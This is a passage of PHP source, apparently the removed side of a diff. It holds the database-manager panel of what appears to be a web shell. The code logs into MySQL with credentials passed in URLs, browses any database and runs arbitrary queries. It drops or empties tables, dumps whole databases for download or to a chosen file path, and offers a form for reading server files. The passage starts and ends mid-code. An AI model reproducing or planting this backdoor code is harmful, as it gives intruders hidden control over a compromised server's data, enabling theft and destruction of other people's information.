-  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");

-  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");

-  $sqlquicklaunch[] = array("Logout",$surl."act=sql");

-  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";

-  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}

-  echo "</center>";

- }

- echo "</td></tr><tr>";

- if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }

- else

- {

-  //Start left panel

-  if (!empty($sql_db))

-  {

-   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php

-   $result = mysql_list_tables($sql_db);

-   if (!$result) {echo mysql_smarterror();}

-   else

-   {

-    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";

-    $c = 0;

-    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}

-    if (!$c) {echo "No tables found in database.";}

-   }

-  }

-  else

-  {

-   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php

-   $result = mysql_list_dbs($sql_sock);

-   if (!$result) {echo mysql_smarterror();}

-   else

-   {

-    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php

-    $c = 0;

-    $dbs = "";

-    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}

-    echo "<option value=\"\">Databases (".$c.")</option>";

-    echo $dbs;

-   }

-   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php

-  }

-  //End left panel

-  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";

-  //Start center panel

-  $diplay = TRUE;

-  if ($sql_db)

-  {

-   if (!is_numeric($c)) {$c = 0;}

-   if ($c == 0) {$c = "no";}

-   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";

-   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}

-   echo "</b></center>";

-   $acts = array("","dump");

-   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}

-   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}

-   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}

-   elseif ($sql_tbl_act == "insert")

-   {

-    if ($sql_tbl_insert_radio == 1)

-    {

-     $keys = "";

-     $akeys = array_keys($sql_tbl_insert);

-     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}

-     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}

-     $values = "";

-     $i = 0;

-     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}

-     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}

-     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";

-     $sql_act = "query";

-     $sql_tbl_act = "browse";

-    }

-    elseif ($sql_tbl_insert_radio == 2)

-    {

-     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);

-     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";

-     $result = mysql_query($sql_query) or print(mysql_smarterror());

-     $result = mysql_fetch_array($result, MYSQL_ASSOC);

-     $sql_act = "query";

-     $sql_tbl_act = "browse";

-    }

-   }

-   if ($sql_act == "query")

-   {

-    echo "<hr size=\"1\" noshade>";

-    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}

-    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}

-    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}

-   }

-   if (in_array($sql_act,$acts))

-   {

-    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php

-    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}

-    if ($sql_act == "newtbl")

-    {

-     echo "<b>";

-     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";

-    }

-    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}

-   }

-   elseif ($sql_act == "dump")

-   {

-    if (empty($submit))

-    {

-     $diplay = FALSE;

-     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";

-     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";

-     $v = join (";",$dmptbls);

-     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";

-     if ($dump_file) {$tmp = $dump_file;}

-     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}

-     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";

-     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";

-     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";

-     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";

-     echo "</form>";

-    }

-    else

-    {

-     $diplay = TRUE;

-     $set = array();

-     $set["sock"] = $sql_sock;

-     $set["db"] = $sql_db;

-     $dump_out = "download";

-     $set["print"] = 0;

-     $set["nl2br"] = 0;

-     $set[""] = 0;

-     $set["file"] = $dump_file;

-     $set["add_drop"] = TRUE;

-     $set["onlytabs"] = array();

-     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}

-     $ret = mysql_dump($set);

-     if ($sql_dump_download)

-     {

-      @ob_clean();

-      header("Content-type: application/octet-stream");

-      header("Content-length: ".strlen($ret));

-      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");

-      echo $ret;

-      exit;

-     }

-     elseif ($sql_dump_savetofile)

-     {

-      $fp = fopen($sql_dump_file,"w");

-      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}

-      else

-      {

-       fwrite($fp,$ret);

-       fclose($fp);

-       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";

-      }

-     }

-     else {echo "<b>Dump: nothing to do!</b>";}

-    }

-   }

-   if ($diplay)

-   {

-    if (!empty($sql_tbl))

-    {

-     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}

-     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");

-     $count_row = mysql_fetch_array($count);

-     mysql_free_result($count);

-     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");

-     $tbl_struct_fields = array();

-     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}

-     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}

-     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}

-     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}

-     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}

-     $perpage = $sql_tbl_le - $sql_tbl_ls;

-     if (!is_numeric($perpage)) {$perpage = 10;}

-     $numpages = $count_row[0]/$perpage;

-     $e = explode(" ",$sql_order);

-     if (count($e) == 2)

-     {

-      if ($e[0] == "d") {$asc_desc = "DESC";}

-      else {$asc_desc = "ASC";}

-      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";

-     }

-     else {$v = "";}

-     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";

-     $result = mysql_query($query) or print(mysql_smarterror());

-     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";

-     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";

-     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";

-     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";

-     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";

-     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}

-     if ($sql_tbl_act == "insert")

-     {

-      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}

-      if (!empty($sql_tbl_insert_radio))

-      {

-

-      }

-      else

-      {

-       echo "<br><br><b>Inserting row into table:</b><br>";

-       if (!empty($sql_tbl_insert_q))

-       {

-        $sql_query = "SELECT * FROM `".$sql_tbl."`";

-        $sql_query .= " WHERE".$sql_tbl_insert_q;

-        $sql_query .= " LIMIT 1;";

-        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());

-        $values = mysql_fetch_assoc($result);

-        mysql_free_result($result);

-       }

-       else {$values = array();}

-       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";

-       foreach ($tbl_struct_fields as $field)

-       {

-        $name = $field["Field"];

-        if (empty($sql_tbl_insert_q)) {$v = "";}

-        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";

-        $i++;

-       }

-       echo "</table><br>";

-       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";

-       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}

-       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";

-      }

-     }

-     if ($sql_tbl_act == "browse")

-     {

-      $sql_tbl_ls = abs($sql_tbl_ls);

-      $sql_tbl_le = abs($sql_tbl_le);

-      echo "<hr size=\"1\" noshade>";

-      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";

-      $b = 0;

-      for($i=0;$i<$numpages;$i++)

-      {

-       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}

-       echo $i;

-       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}

-       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}

-       else {echo "&nbsp;";}

-      }

-      if ($i == 0) {echo "empty";}

-      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";

-      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";

-      echo "<tr>";

-      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";

-      for ($i=0;$i<mysql_num_fields($result);$i++)

-      {

-       $v = mysql_field_name($result,$i);

-       if ($e[0] == "a") {$s = "d"; $m = "asc";}

-       else {$s = "a"; $m = "desc";}

-       echo "<td>";

-       if (empty($e[0])) {$e[0] = "a";}

-       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}

-       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}

-       echo "</td>";

-      }

-      echo "<td><font color=\"green\"><b>Action</b></font></td>";

-      echo "</tr>";

-      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))

-      {

-       echo "<tr>";

-       $w = "";

-       $i = 0;

-       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}

-       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}

-       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";

-       $i = 0;

-       foreach ($row as $k=>$v)

-       {

-        $v = htmlspecialchars($v);

-        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}

-        echo "<td>".$v."</td>";

-        $i++;

-       }

-       echo "<td>";

-       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";

-       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";

-       echo "</td>";

-       echo "</tr>";

-      }

-      mysql_free_result($result);

-      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";

-      echo "<option value=\"\">With selected:</option>";

-      echo "<option value=\"deleterow\">Delete</option>";

-      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";

-     }

-    }

-    else

-    {

-     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);

-     if (!$result) {echo mysql_smarterror();}

-     else

-     {

-      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";

-      $i = 0;

-      $tsize = $trows = 0;

-      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))

-      {

-       $tsize += $row["Data_length"];

-       $trows += $row["Rows"];

-       $size = view_size($row["Data_length"]);

-       echo "<tr>";

-       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";

-       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";

-       echo "<td>".$row["Rows"]."</td>";

-       echo "<td>".$row["Type"]."</td>";

-       echo "<td>".$row["Create_time"]."</td>";

-       echo "<td>".$row["Update_time"]."</td>";

-       echo "<td>".$size."</td>";

-       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";

-       echo "</tr>";

-       $i++;

-      }

-      echo "<tr bgcolor=\"000000\">";

-      echo "<td><center><b>»</b></center></td>";

-      echo "<td><center><b>".$i." table(s)</b></center></td>";

-      echo "<td><b>".$trows."</b></td>";

-      echo "<td>".$row[1]."</td>";

-      echo "<td>".$row[10]."</td>";

-      echo "<td>".$row[11]."</td>";

-      echo "<td><b>".view_size($tsize)."</b></td>";

-      echo "<td></td>";

-      echo "</tr>";

-      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";

-      echo "<option value=\"\">With selected:</option>";

-      echo "<option value=\"tbldrop\">Drop</option>";

-      echo "<option value=\"tblempty\">Empty</option>";

-      echo "<option value=\"tbldump\">Dump</option>";

-      echo "<option value=\"tblcheck\">Check table</option>";

-      echo "<option value=\"tbloptimize\">Optimize table</option>";

-      echo "<option value=\"tblrepair\">Repair table</option>";

-      echo "<option value=\"tblanalyze\">Analyze table</option>";

-      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";

-      mysql_free_result($result);

-     }

-    }

-   }

-   }

-  }

-  else

-  {

-   $acts = array("","newdb","serverstatus","servervars","processes","getfile");

-   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }

-   if (!empty($sql_act))

-   {

-    echo "<hr size=\"1\" noshade>";

-    if ($sql_act == "newdb")

-    {

-     echo "<b>";

-     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}

-     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}

-    }

-    if ($sql_act == "serverstatus")

-    {

-     $result = mysql_query("SHOW STATUS", $sql_sock);

-     echo "<center><b>Server-status variables:</b><br><br>";

-     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";

-     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}

-     echo "</table></center>";

-     mysql_free_result($result);

-    }

-    if ($sql_act == "servervars")

-    {

-     $result = mysql_query("SHOW VARIABLES", $sql_sock);

-     echo "<center><b>Server variables:</b><br><br>";

